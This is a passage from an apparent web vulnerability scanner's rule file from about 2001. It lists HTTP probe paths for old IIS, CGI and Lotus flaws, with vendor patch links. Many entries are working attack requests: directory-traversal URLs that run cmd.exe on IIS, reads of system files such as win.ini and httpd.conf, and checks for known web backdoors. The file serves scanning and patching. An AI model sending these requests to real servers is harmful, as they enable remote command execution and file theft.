:/exchange/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 11;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/adsamples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 12;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/_mem_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 13;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; #end IIS File Parsing Vulnerability Remote Execute Check 200 OK-> GET :/scripts/cpshost.dll^Site Server 2 File Upload(cpshost.dll);http://www.microsoft.com/siteserver/; 200 OK-> GET :/scripts/uploadn.asp^Site Server 2 File Upload(uploadn.asp);http://www.microsoft.com/siteserver/; 200 OK-> GET :/scripts/uploadx.asp^Site Server 2 File Upload(uploadx.asp);http://www.microsoft.com/siteserver/; 200 OK-> GET :/scripts/upload.asp^Site Server 2 File Upload(upload.asp);http://www.microsoft.com/siteserver/; 200 OK-> GET :/scripts/repost.asp^Site Server 2 File Upload(repost.asp);http://www.microsoft.com/siteserver/; 200 OK-> GET :/scripts/postinfo.asp^Site Server 2 File Upload(postinfo.asp);http://www.microsoft.com/siteserver/; 200 OK-> GET :/default.asp^IIS some information(default.asp);delete default.asp; 200 OK-> GET :/null.htw?CiWebHitsFile=/index.htm&CiRestriction=""^Indexing service for win2k .htw;solution:http://www.microsoft.com/technet/security/bulletin/ms00-084.asp; 200 OK-> GET :/cgi-bin/c32web.exe/ShowAdminDir^Cart32 multiple(c32web.exe) check A ;solution:http://www.cart32.com/update; 200 OK-> GET :/cgi-bin/c32web.exe/CheckError?error=53^Cart32 multiple(c32web.exe) check B ;solution:http://www.cart32.com/update; 200 OK-> GET :/ex/jsp/simple.jsp.^Unify ServletExec JSP simple.jsp.) ;http://www.unify.com/products/ewave/servletexec.htm; 200 OK-> GET :/pbserver/^MS PhoneBook Server bof (/pbserver/);http://www.microsoft.com/technet/security/bulletin/ms00-094.asp; 200 OK-> GET :/pbserver/pbserver.dll^MS PhoneBook Server bof (pbserver.dll);http://www.microsoft.com/technet/security/bulletin/ms00-094.asp; 200 OK-> GET :/index.php3.%5c../..%5cconf/httpd.conf^Apache,PHP file disclosure(httpd.conf);http://www.apache.org; 200 OK-> GET :/../../../autoexec.bat^Keware file disclosure(autoexec.bat);http://www.keware.com; 200 OK-> GET :/.nsf/../winnt/win.ini^Lotus Domino Direcotry(win.ini);; 200 OK-> GET :/scripts/bbs.pl%3F+.htr^IIS 5 Source 3F+.htr test A ;solution:http://www.microsoft.com/technet/security/bulletin/ms01-004.asp; 200 OK-> GET :/login.asp%3F+.htr^IIS 5 Source 3F+.htr test B ;solution:http://www.microsoft.com/technet/security/bulletin/ms01-004.asp; 200 OK-> GET :/cpqlogin.htm^Compaq Web Admin bof(/cpqlogin.htm);http://www5.compaq.com/products/servers/management/agentsecurity.html; 200 OK-> GET :/Proxy/LoginResponse^Compaq Web Admin bof(LoginResponse);http://www5.compaq.com/products/servers/management/agentsecurity.html; 200 OK-> GET :/cgi-bin/statsconfig.pl^OmniHTTPD Execute(statsconfig.pl);delete file or http://www.omnicron.ab.ca; 200 OK-> GET :/a.jsp//..//..//..//..//..//../winnt/win.ini^Oracle Servlet (win.ini) ;solution:http://otn.oracle.com/software/tech/java/servlets/htdocs/listing.htm; 200 OK-> GET :/..\\..\\..\\..\\..\\..\autoexec.bat^GoAhead Webserver file(autoexec.bat);http://www.goahead.com/webserver/webserver.htm; 200 OK-> GET :/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\^GoAhead Webserver remote execute;http://www.goahead.com/webserver/webserver.htm; 200 OK-> GET :/cgi/^HSWeb Server Path(/cgi/);http://www.jeffheaton.com/hsweb/; 200 OK-> GET :/isapi/tstisapi.dll^Pi3Web Buffer overflow(tstisapi.dll);solution:delete file; 200 OK-> GET :/../../../scandisk.log^WEBactive file read(scandisk.log);solution:uninstall WEBactive; 200 OK-> GET :\\../readme.txt^Caucho Resin file read(readme.txt);http://www.caucho.com; 200 OK-> GET :/../../../../../../Scandisk.log^A1 Server v1.0a HTTPd (Scandisk.log);http://msnhomepages.talkcity.com/windowsway/lriver2/a1server.htm; 200 OK-> GET ::8080/.jsp/WEB-INF/classes/Env.java^Resin Javabean file disclosure vulnerability;; #IIS .printer mapping buffer overflow check [english] Error in web printer-> GET :/NULL.printer HTTP/1.0\r\n\r\n^IIS 5 .printer check test;Disabling web based printing results in a registry entry.\n\tHKLM\Software\Policies\Microsoft\windows NT\printers\DisableWebPrinting\n\tREG_DWORD 0x1\n\tThis entry must be set to 1 for the .printer mapping to reliably be disabled.\n\t .printer have a buffer overflow-high lisk\n\tif you didn't patch,you must to patch your server\t\n\thttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321; #korean À¥ ÇÁ¸°ÅÍ ¼³Ä¡¿¡ ÀÖ´Â ¿À·ù-> GET :/NULL.printer HTTP/1.0\r\n\r\n^IIS 5 .printer check test;Disabling web based printing results in a registry entry.\n\tHKLM\Software\Policies\Microsoft\windows NT\printers\DisableWebPrinting\n\tREG_DWORD 0x1\n\tThis entry must be set to 1 for the .printer mapping to reliably be disabled.\n\t .printer have a buffer overflow-high lisk\n\tif you didn't patch,you must to patch your server\t\n\thttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321; ########################################################################################################## # IIS 4/5 CGI Decode bug scan rule file for tuxe, arirang information by # Aldo Albuquerque - CCSA Tempest Security Technologies - http://www.tempest.com.br # CESAR - Centro de Estudos e Sistemas Avan?dos do Recife - # http://www.cesar.org.br # IIS 4/5 CGI Decoding bug found by nsfocus http://www.nsfocus.com/english/homepage/sa01-02.htm # CVE : http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0333 # vendor patch # IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787 # IIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764 # 200 OK-> GET :/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug1;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug2;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug3;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug4;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug5;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug6;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug7;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug8;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug9;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug10;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug11;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug12;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug13;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug14;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; #- Windows 2000 Server + SP1 + IIS5.0 - Default installation #* The following combinations of directories/encodings work: 200 OK-> GET :/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug15;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug16;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug17;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug18;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug19;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug20;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug21;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug22;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug23;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug24;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug25;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug26;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug27;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug28;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug29;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug30;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug31;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug32;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/exchange/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug33;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug34;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; 200 OK-> GET :/cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\^IIS4/5 CGI Decode bug35;IIS 4.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787\n\tIIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764; # check secure IIS 5 http://www.microsoft.com/technet/security/iis5chk.asp ########## end NT check ############################## ########## start Unix check ############################### 200 OK-> GET :/cgi-bin/lasso.cgi^lasso.cgi;; 200 OK-> GET :/cgi-bin/rwwwshell.pl^THC Web Backdoor(rwwwshell.pl);; 200 OK-> GET :/cgi-bin/unlg1.1^Un1G Web Backdoor(un1g1.1);; 200 OK-> GET :/cgi-bin/unlg1.2^Un1G Web Backdoor(un1g1.2);; 200 OK-> GET :/cgi-bin/phf^PHF(phf);; 200 OK-> GET :/cgi-bin/phf.cgi^PHF(phf.cgi);; 200 OK-> GET :/cgi-bin/test-cgi^test-cgi;; 200 OK-> GET :/cgi-bin/finger^Local host finger (finger);; 200 OK-> GET :/cgi-bin/Count.cgi^Count.cgi bof(Count.cgi);; 200 OK-> GET :/cgi-bin/jj^Escape to a shell(jj);; 200 OK-> GET :/cgi-bin/day5datacopier.cgi^IRIX(day5datacopier.cgi);; 200 OK-> GET :/cgi-bin/day5datanotifier.cgi^IRIX(day5datanotifier.cgi);; 200 OK-> GET :/cgi-bin/php.cgi^bof(php.cgi);; 200 OK-> GET :/cgi-bin/php^php;; 200 OK-> GET :/cgi-bin/nph-test-cgi^nph-test-cgi;; 200 OK-> GET :/cgi-bin/nph-publish^nph-publish;; 200 OK-> GET :/cgi-bin/handler^IRIX(handler);; 200 OK-> GET :/cgi-bin/webdist.cgi^IRIX(webdist.cgi);; 200 OK-> GET :/cgi-bin/wrap.cgi^IRIX(wrap.cgi);; 200 OK-> GET :/cgi-bin/AnyForm2^AnyForm2 ;; 200 OK-> GET :/cgi-bin/webgais^web sendmail security hole(webgais);; 200 OK-> GET :/cgi-bin/websendmail^web sendmail security hole(websendmail);; 200 OK-> GET :/cgi-bin/faxsurvey^faxsurvey;; 200 OK-> GET :/cgi-bin/htmlscript^htmlscript;; 200 OK-> GET :/cgi-bin/pfdisplay.cgi^IRIX(pfdisplay.cgi);; 200 OK-> GET :/cgi-bin/perl.exe^shell execute perl.exe;; 200 OK-> GET :/cgi-bin/wwwboard.pl^WebBoard(wwwboard.pl);; 200 OK-> GET :/cgi-bin/www-sql^www-sql;; 200 OK-> GET :/cgi-bin/view-source^SCO(view-source);; 200 OK-> GET :/cgi-bin/campas^campas;; 200 OK-> GET :/cgi-bin/aglimpse^Glimpse HTTP security hole(aglimpse);; 200 OK-> GET :/cgi-bin/glimpse^Glimpse HTTP security hole(glimpse);; 200 OK-> GET :/cgi-bin/man.sh^man.sh;; 200 OK-> GET :/cgi-bin/AT-admin.cgi^Excite 1.1(AT-admin.cgi);; 200 OK-> GET :/cgi-bin/AT-generate.cgi^Excite 1.1(AT-generate.cgi);; 200 OK-> GET :/cgi-bin/filemail.pl^filemail.pl;; 200 OK-> GET :/cgi-bin/maillist.pl^maillist.pl;; 200 OK-> GET :/cgi-bin/info2www^info2www;; 200 OK-> GET :/cgi-bin/files.pl^files.pl;; 200 OK-> GET :/cgi-bin/bnbform.cgi^bnbform.cgi;; 200 OK-> GET :/cgi-bin/survey.cgi^survey.cgi;; 200 OK-> GET :/cgi-bin/textcounter.pl^textcounter.pl;; 200 OK-> GET :/cgi-bin/classifieds.cgi^classifieds.cgi;; 200 OK-> GET :/cgi-bin/environ.cgi^environ.cgi;; 200 OK-> GET :/cgi-bin/wrap^wrap;; 200 OK-> GET :/cgi-bin/cgiwrap^cgiwrap;; 200 OK-> GET :/cgi-bin/edit.pl^edit.pl;; 200 OK-> GET :/cgi-bin/perl^perl;; 200 OK-> GET :/domcfg.nsf^Lotus Note(domcfg.nsf);; 200 OK-> GET :/today.nsf^Lotus Note(today.nsf);; 200 OK-> GET :/names.nsf^Lotus Note(names.nsf);; 200 OK-> GET :/catalog.nsf^Lotus Note(catalog.nsf);; 200 OK-> GET :/log.nsf^Lotus Note(log.nsf) ;; 200 OK-> GET :/domlog.nsf^Lotus Note(domlog.nsf);; 200 OK-> GET :/cgi-bin/Xrun.cgi^Lotus Note(Xrun.cgi);; 200 OK-> GET :/cgi-bin/webgais^Gais tool(webgais);; 200 OK-> GET :/cgi-bin/dumpenv.pl^Sambar Server(dumpenv.pl);; 200 OK-> GET :/adminlogin?RCpage=/sysadmin/index.stm^adminlogin;; 200 OK-> GET :/test/test.cgi^Cobalt RaQ2 server(test.cgi);; 200 OK-> GET :/scripts/submit.cgi^Cobalt RaQ2 server(submit.cgi) A;; 200 OK-> GET :/users/scripts/submit.cgi^Cobalt RaQ2 server(submit.cgi) B;; 200 OK-> GET :/cgi-bin/guestbook.cgi^guestbook.cgi;; 200 OK-> GET :/cgi-bin/guestbook.pl^guestbook.pl ;; 200 OK-> GET :/cgi-bin/cachemgr.cgi^Redhat 6(cachemgr.cgi) ;; 200 OK-> GET :/cgi-bin/whois_raw.cgi^whois_raw.cgi ;; 200 OK-> GET :/cgi-bin/responder.cgi^Mac HTTP(responder.cgi) ;; 200 OK-> GET :/cgi-bin/perlshop.cgi^Shopping Carts(perlshop.cgi);; 200 OK-> GET :/ncl_items.html?SUBJECT=2097^Tektronix Webserver(ncl_items.html);; 200 OK-> GET :/cgi-bin/webwho.pl^webwho.pl;; 200 OK-> GET :/manage/cgi/cgiproc^Nortel Contivity DoS,view(cgiproc) ;; 200 OK-> GET :/cgi-bin/query^AltaVista Search Engine(query);; 200 OK-> GET :/cgi-bin/w3-msql^w3-msql;; 200 OK-> GET :/cgi-bin/search.cgi?letter=^Home Free CGI(search.cgi);; 200 OK-> GET :/cgi-bin/plusmail^PowerScripts PlusMail(plusmail);; 200 OK-> GET :/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi^Cobalt(siteUserMod.cgi) ;; 200 OK-> GET :/cgi-bin/htsearch^Htdig <= 3.1.4(htsearch);www.htdig.org; 200 OK-> GET :/cgi-bin/loadpage.cgi^EZ Shopper 3.0(loadpage.cgi) ;; 200 OK-> GET :/cgi-bin/rpm_query^OpenLinux(rpm_query);; 200 OK-> GET :/cgi-bin/infosrch.cgi^IRIX 6.5(infosrch.cgi);; 200 OK-> GET :/publisher^Netscape Web Publishing(publisher);; 200 OK-> GET :/PSUser/PSCOErrPage.htm^PublishingXpert 2.*(PSCOErrPage.htm);; 200 OK-> GET :/cgi-bin/getdoc.cgi^Infonautics(getdoc.cgi);; 200 OK-> GET :/cgi-bin/bizdb1-search.cgi^BizDB Search(bizdb1-search.cgi);; 200 OK-> GET :/cgi-bin/htsearch?config=aaa^htDig path reveals;; 200 OK-> GET :/piranha/secure/passwd.php3^Redhat 6.2 backdoor(passwd.php3);; 500-> GET :/piranha/secure/passwd.php3^Redhat 6.2 backdoor(passwd.php3);; 401-> GET :/piranha/secure/passwd.php3^Redhat 6.2 backdoor(passwd.php3);; 200 OK-> GET :/ultraboard.pl^UltraBoard(ultraboard.pl),DoS;; 200 OK-> GET :/cgi-bin/ultraboard.cgi^UltraBoard(ultraboard.cgi);; 200 OK-> GET :/scripts/dbman/db.cgi^Gossamer Threads DBMan(db.cgi);; 200 OK-> GET :/cgi-bin/formmail.cgi^Matt Wright FormMail(formmail.cgi);; 200 OK-> GET :/cgi-bin/dnewsweb.cgi^DNews Web bof(dnewsweb.cgi);; 200 OK-> GET :/cgi-bin/dmailweb.cgi^DMail Web bof(dmailweb.cgi) ;; 200 OK-> GET :/cgi-bin/calender.pl^Matt Kruse Calendar(calender.pl);; 200 OK-> GET :/cgi-bin/calender_admin.pl^Matt Kruse Calendar(calender_admin.pl);; 200 OK-> GET :/cgi-bin/allmanage.pl^Allmanage(allmanage.pl) ;; 200 OK-> GET :/cgi-bin/allmanageup.pl^Allmanage(allmanageup.pl) ;; 200 OK-> GET :/cgi-bin/ssi^thttpd web server(ssi);; 200 OK-> GET :/adpassword.txt^Banner Rotation 01(adpassword.txt) ;; 200 OK-> GET :/cgi-bin/redirect.cgi^PDGSoft Shopping Cart(redirect.cgi) ;; 200 OK-> GET :/cgi-bin/changepw.cgi^PDGSoft Shopping Cart(changepw.cgi);; 200 OK-> GET :/cgi-bin/counterfiglet/nc/f^George Burgyan counter 4.0.7 ;; 200 OK-> GET :/cgi-bin/mdma.bat^Savant expose CGI (mdma.bat) ;; 200 OK-> GET :/cgi-auth/userreg.cgi^MailStudio2000 ver <=2.0 (userreg.cgi);; 200 OK-> GET ::8987/sawmill^Sawmill file and password (sawmill) ;; 200 OK-> GET :/cgi-bin/search/tidfinder.cgi?2956734^NetWare Netscape Server (tidfinder.cgi);; 200 OK-> GET :/cgi-bin/view_page.html^MiniVend Security Hole (view_page.html);; 200 OK-> GET :/admin-serv/config/admpw^Netscape Admin password (admpw);; 200 OK-> GET :/cgi-bin/cvsweb/cvsweb.cgi^Cvsweb 1.80 Security Hole (cvsweb.cgi);; 200 OK-> GET :/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00^Poll It v2.0 (Poll_It_SSI_v2.0.cgi) ;; 200 OK-> GET :/examples/applications/bboard/bboard_frames.html^Sun Java Web Server(bboard_frames.html);; 200 OK-> GET :/pservlet.html^Sun Jave Web Servets (pservlet.html);; 200 OK-> GET :/login.jsp^WebSphere<=3.0.21 Showcode(login.jsp);; 200 OK-> GET :/ConsoleHelp/login.jsp^Weblogic SSIServlet Showcode(login.jsp);; 200 OK-> GET :/pccsmysqladm/incs/dbconnect.inc^PCCS<1.2.5 Mysql password dbconnect.inc);; 200 OK-> GET :/cgi-bin/admin/admin^Solaris AnswerBook2(admin);; 200 OK-> GET :/cgi-bin/netauth.cgi^Netauth<=4.2 (netauth.cgi);; 200 OK-> GET :/cgi-bin/htgrep^HtGrep CGI file view(htgrep);; 200 OK-> GET :/cgi-bin/wais.pl^wais.pl file view(wais.pl) ;; 200 OK-> GET :/admin.php3?admin=anything^PHP-NUKE<=2.5(admin.php3) ;; 200 OK-> GET :/cgi-bin/amlite/amadmin.pl^Account Manger 1.0(amadmin.pl);; 200 OK-> GET :/cgi-bin/subscribe.pl^subscribe Me Lite 2.0(subscribe.pl);; 200 OK-> GET :/cgi-bin/news/news.cgi^News Publisher(news.cgi);; 200 OK-> GET :/cgi-bin/awl/auctionweaver.pl^Auction_Weaver(auctionweaver.pl);; #directory and log 200 OK-> GET :/admin/^/admin/;; 403-> GET :/admin/^/admin/;; 200 OK-> GET :/administrator/^/administrator/;; 403-> GET :/administrator/^/administrator/;; 200 OK-> GET :/download/^/download/;; 200 OK-> GET :/downloads/^/downloads/;; 200 OK-> GET :/data/^/data/;; 200 OK-> GET :/db/^/db/;; 200 OK-> GET :/include/^/include/;; 200 OK-> GET :/includes/^/includes/;; 200 OK-> GET :/programs/^/programs/;; 200 OK-> GET :/incoming/^/incoming/;; 200 OK-> GET :/ftp/^/ftp/;; 200 OK-> GET :/work/^/work/;; 200 OK-> GET :/backup/^/backup/;; 200 OK-> GET :/docs/^/docs/;; 200 OK-> GET :/bbs/^/bbs/;; 200 OK-> GET :/bbs/data/^/bbs/data/;; 200 OK-> GET :/down/^/down/;; 200 OK-> GET :/bbs/admin/config/^/bbs/admin/config/;; 200 OK-> GET :/bbs/admin/^/bbs/admin/;; 200 OK-> GET :/bbs/include/^/bbs/include/;; 200 OK-> GET :/.htaccess/^/.htaccess/;; 200 OK-> GET :/.htpasswd/^/.htpasswd/;; 200 OK-> GET :/htdocs/^/htdocs/;; 200 OK-> GET :/bbs/db/^/bbs/db/;; 200 OK-> GET :/manual/^/manual/;; 200 OK-> GET :/misc/^/misc/;; 200 OK-> GET :/mp3/^/mp3/;; 200 OK-> GET :/cgi-bin/Board/db/^/cgi-bin/Board/db/;; 200 OK-> GET :/sex/^/sex/;; 200 OK-> GET :/porno/^/porno/;; 200 OK-> GET :/img/^/img/;; 200 OK-> GET :/image/^/image/;; 200 OK-> GET :/images/^/images/;; 200 